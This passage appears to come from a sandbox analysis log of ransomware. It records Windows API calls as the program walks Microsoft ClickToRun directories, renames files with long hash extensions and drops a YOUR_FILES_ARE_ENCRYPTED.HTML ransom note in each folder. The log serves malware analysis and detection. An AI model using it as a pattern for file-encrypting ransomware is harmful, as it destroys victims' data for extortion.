Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat.B52A6CC8FB7587F444C47DF3B494EA273D8CB96D932F5714F89DEFF12500AF29") returned 179 [0109.792] PathFindExtensionW (pszPath="stream.x86.en-us.man.dat.B52A6CC8FB7587F444C47DF3B494EA273D8CB96D932F5714F89DEFF12500AF29") returned=".B52A6CC8FB7587F444C47DF3B494EA273D8CB96D932F5714F89DEFF12500AF29" [0109.792] lstrlenW (lpString=".B52A6CC8FB7587F444C47DF3B494EA273D8CB96D932F5714F89DEFF12500AF29") returned 65 [0109.792] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad855ae6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xad855ae6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad85ab57, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.793] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad855ae6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xad855ae6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad85ab57, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.793] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0109.793] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0109.793] GetProcessHeap () returned 0x600000 [0109.793] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.793] GetProcessHeap () returned 0x600000 [0109.793] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.793] GetProcessHeap () returned 0x600000 [0109.793] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.794] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xad8f9441, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad8f9441, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="x-none.16", cAlternateFileName="")) returned 1 [0109.794] StrStrIW (lpFirst="x-none.16", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.794] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16") returned 90 [0109.794] GetProcessHeap () returned 0x600000 [0109.794] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.795] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16" [0109.795] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*" [0109.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xad8f9441, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad96d099, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0109.796] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xad8f9441, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad96d099, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="..", cAlternateFileName="")) returned 1 [0109.796] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xad8e1a4b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x5220, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="MasterDescriptor.x-none.xml.DCFF3D82D1B1ED9BA78E08C4292CAFF1E455C7F588D712BCDFC010ADFE95300D", cAlternateFileName="MASTER~1.DCF")) returned 1 [0109.796] StrStrIW (lpFirst="MasterDescriptor.x-none.xml.DCFF3D82D1B1ED9BA78E08C4292CAFF1E455C7F588D712BCDFC010ADFE95300D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.796] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\MasterDescriptor.x-none.xml.DCFF3D82D1B1ED9BA78E08C4292CAFF1E455C7F588D712BCDFC010ADFE95300D") returned 183 [0109.796] PathFindExtensionW (pszPath="MasterDescriptor.x-none.xml.DCFF3D82D1B1ED9BA78E08C4292CAFF1E455C7F588D712BCDFC010ADFE95300D") returned=".DCFF3D82D1B1ED9BA78E08C4292CAFF1E455C7F588D712BCDFC010ADFE95300D" [0109.796] lstrlenW (lpString=".DCFF3D82D1B1ED9BA78E08C4292CAFF1E455C7F588D712BCDFC010ADFE95300D") returned 65 [0109.796] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="s320.hash", cAlternateFileName="S320~1.HAS")) returned 1 [0109.796] StrStrIW (lpFirst="s320.hash", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.796] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\s320.hash") returned 100 [0109.796] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0109.796] lstrlenW (lpString=".hash") returned 5 [0109.796] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0109.796] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xad9ec56e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="stream.x86.x-none.man.dat.6692D2404DB80B31AF2521527511E37531F5A60515884ABCBA3B987BD9F4023E", cAlternateFileName="STREAM~1.669")) returned 1 [0109.796] StrStrIW (lpFirst="stream.x86.x-none.man.dat.6692D2404DB80B31AF2521527511E37531F5A60515884ABCBA3B987BD9F4023E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.796] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat.6692D2404DB80B31AF2521527511E37531F5A60515884ABCBA3B987BD9F4023E") returned 181 [0109.796] PathFindExtensionW (pszPath="stream.x86.x-none.man.dat.6692D2404DB80B31AF2521527511E37531F5A60515884ABCBA3B987BD9F4023E") returned=".6692D2404DB80B31AF2521527511E37531F5A60515884ABCBA3B987BD9F4023E" [0109.796] lstrlenW (lpString=".6692D2404DB80B31AF2521527511E37531F5A60515884ABCBA3B987BD9F4023E") returned 65 [0109.796] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad96d099, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xad96d099, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad970b74, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.796] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad96d099, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xad96d099, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad970b74, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.796] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0109.797] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0109.797] GetProcessHeap () returned 0x600000 [0109.797] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.797] GetProcessHeap () returned 0x600000 [0109.797] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.797] GetProcessHeap () returned 0x600000 [0109.797] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.798] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad9759b6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xad9759b6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad9796d0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.798] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad9759b6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xad9759b6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad9796d0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.798] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0109.798] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0109.798] GetProcessHeap () returned 0x600000 [0109.798] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.799] GetProcessHeap () returned 0x600000 [0109.799] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.799] GetProcessHeap () returned 0x600000 [0109.799] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.799] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d04153d, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d04153d, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xada33955, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x7b6, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="DeploymentConfig.0.xml.C2A50E74CBBCE2D28D8FE1595662EB9DA2E91D1B214115E0AA3F728475C0B167", cAlternateFileName="DEPLOY~1.C2A")) returned 1 [0109.799] StrStrIW (lpFirst="DeploymentConfig.0.xml.C2A50E74CBBCE2D28D8FE1595662EB9DA2E91D1B214115E0AA3F728475C0B167", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.800] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.C2A50E74CBBCE2D28D8FE1595662EB9DA2E91D1B214115E0AA3F728475C0B167") returned 131 [0109.800] PathFindExtensionW (pszPath="DeploymentConfig.0.xml.C2A50E74CBBCE2D28D8FE1595662EB9DA2E91D1B214115E0AA3F728475C0B167") returned=".C2A50E74CBBCE2D28D8FE1595662EB9DA2E91D1B214115E0AA3F728475C0B167" [0109.800] lstrlenW (lpString=".C2A50E74CBBCE2D28D8FE1595662EB9DA2E91D1B214115E0AA3F728475C0B167") returned 65 [0109.800] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c5095b, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x85c5095b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xada29833, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="DeploymentConfig.2.xml.23E6E799BC481CCB75186B6F590BCD776071F6F17EA585A13FF58529FDC5181B", cAlternateFileName="DEPLOY~1.23E")) returned 1 [0109.800] StrStrIW (lpFirst="DeploymentConfig.2.xml.23E6E799BC481CCB75186B6F590BCD776071F6F17EA585A13FF58529FDC5181B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.800] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.23E6E799BC481CCB75186B6F590BCD776071F6F17EA585A13FF58529FDC5181B") returned 131 [0109.800] PathFindExtensionW (pszPath="DeploymentConfig.2.xml.23E6E799BC481CCB75186B6F590BCD776071F6F17EA585A13FF58529FDC5181B") returned=".23E6E799BC481CCB75186B6F590BCD776071F6F17EA585A13FF58529FDC5181B" [0109.800] lstrlenW (lpString=".23E6E799BC481CCB75186B6F590BCD776071F6F17EA585A13FF58529FDC5181B") returned 65 [0109.800] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="MachineData", cAlternateFileName="MACHIN~1")) returned 1 [0109.800] StrStrIW (lpFirst="MachineData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.800] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData") returned 55 [0109.800] GetProcessHeap () returned 0x600000 [0109.800] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.806] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData" [0109.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*" [0109.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadc44550, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0109.807] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadc44550, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="..", cAlternateFileName="")) returned 1 [0109.807] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a4d6f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="Catalog", cAlternateFileName="")) returned 1 [0109.807] StrStrIW (lpFirst="Catalog", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.807] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned 63 [0109.807] GetProcessHeap () returned 0x600000 [0109.807] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.808] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog" [0109.808] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*" [0109.808] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadaf7cdb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60ef60, dwReserved1=0x63c218, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0109.808] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadaf7cdb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60ef60, dwReserved1=0x63c218, cFileName="..", cAlternateFileName="")) returned 1 [0109.809] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60ef60, dwReserved1=0x63c218, cFileName="Packages", cAlternateFileName="")) returned 1 [0109.809] StrStrIW (lpFirst="Packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.809] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned 72 [0109.809] GetProcessHeap () returned 0x600000 [0109.809] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0109.809] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" [0109.809] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*" [0109.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadaf1e82, 